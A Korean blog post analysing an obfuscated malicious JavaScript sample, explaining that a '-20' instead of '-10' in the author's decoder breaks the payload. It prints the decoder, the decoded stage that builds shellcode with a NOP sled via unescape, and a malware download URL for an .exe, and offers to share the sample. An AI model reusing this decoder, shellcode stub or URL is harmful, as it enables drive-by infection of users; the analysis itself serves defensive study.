Increase 를 이용한 악성 스크립트는 제작자의 실수 !!

이전글 :  Increase 를 이용한 악성 스크립트 !

글을 쓰기에 앞서서 먼저 글을 봐주시고 오류를 말씀해주신 바이쭌님께 감사를 드립니다 :D
제가 쓴글이 틀림을 이렇게 정정 합니다.

function a(p){var j,t;j="";for(i=1;i<=p.length;i++){if((i%2)==0){t="0x"+p.substr(i-2,2);t=t.toString(10)-20;j=j+String.fromCharCode(t);}}return j;}window.document.write(a("466C7F7E7E79782A736E4731777978(중략)D4F4397D6D7C737A7E48"));window.location.reload();

해당 스크립트는 제가 보기에 전까지만 해도 증가 +10을 이용하여서 푸는 것인줄 이제까지 알아왔습니다. 하지만 쭌님께서 알려주신대로 해당 스크립트는 제작자의 실수로 부이는 부분을 저에게 알려주셨습니다. 그 실수 부분은 다음과 같습니다.

주목 해야 할 부분은 t=t.toString(10)-20 주목 해야할 부분입니다. 해당 함수값때문에 깨지는 것처럼 보이기 때문입니다. 그러니 window.alert(x) 를 출력하여도 이와 같이 코드가

2Xkjjed_Z3cededYb_Ya3iYb_Ya1IJOB;3:?IFB7O0DED;42%Xkjjed42iYh_fjbWd]kW][3@WlWIYh_fjZ[\[h4\kdYj_edY`ciqlWhhijh"d1d31\eh_3'1_23i$b[d]j^1_!!q_\_*33&qhijh3k!i$ikXijh_#("(!i$ikXijh_#*"(1d3d!hijh1ssh[jkhdkd(중략)^[qsm_dZem$ijWjki!31sZeYkc[iYh_fj4

원래 -10번 해야 할것을 -20 번을 했으니 나타나는 현상 같습니다. 또한 첫 함수인 -20을 한 상태에서는 최종파일 http://6x.109.247.31/menual/xxload/vpn/10/x/wmpub/x.exe 를 가져 오지 않는다는것을 확인하였습니다.
-10 으로 해야만이 본래의 코드도 보일 뿐더라 최종 파일까지 같이 끌어다 온다는것을 알게 되었습니다.

다음은 -10 일때의 결과 입니다.

<button id='mon' onclick='sclick();' STYLE='DISPLAY:NONE'></button><script language="JavaScript" defer> function cjm(s){ var rstr,n; n=""; for (i=1;i<=s.length ;i++ ) { if ((i % 4)==0) { rstr = "%u"+s.substr(i-2,2)+s.substr(i-4,2); n= n + rstr; } } return unescape(n); } var lv = cjm("9090909058585858EB105B4B33C966B9[URL 생략]DBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDEAEA")

이런식으로 보일 뿐더러 수정했을때는 최종파일까지 Get 할 수 있습니다. 하지만 - 20 인 상태에서도 Increase 10번을 한다면 이와 같은 결과는 나오지만 asp 파일에서 받아올려면 -20 ~> -10 으로 수정한다면 같이 최종파일을 불러 올 수 있는 결과가 나오게 됩니다.

어쨌든 이번것은 인크리스를 불러오는 함수도 없었던 만큼 제작자의 사소한 실수가 아닐까 하면서 이 글을 마칩니다.

혹시 이 샘플에 대해 필요하신분은 댓글을 남겨주신다면 따로 전송해 드리겠습니다.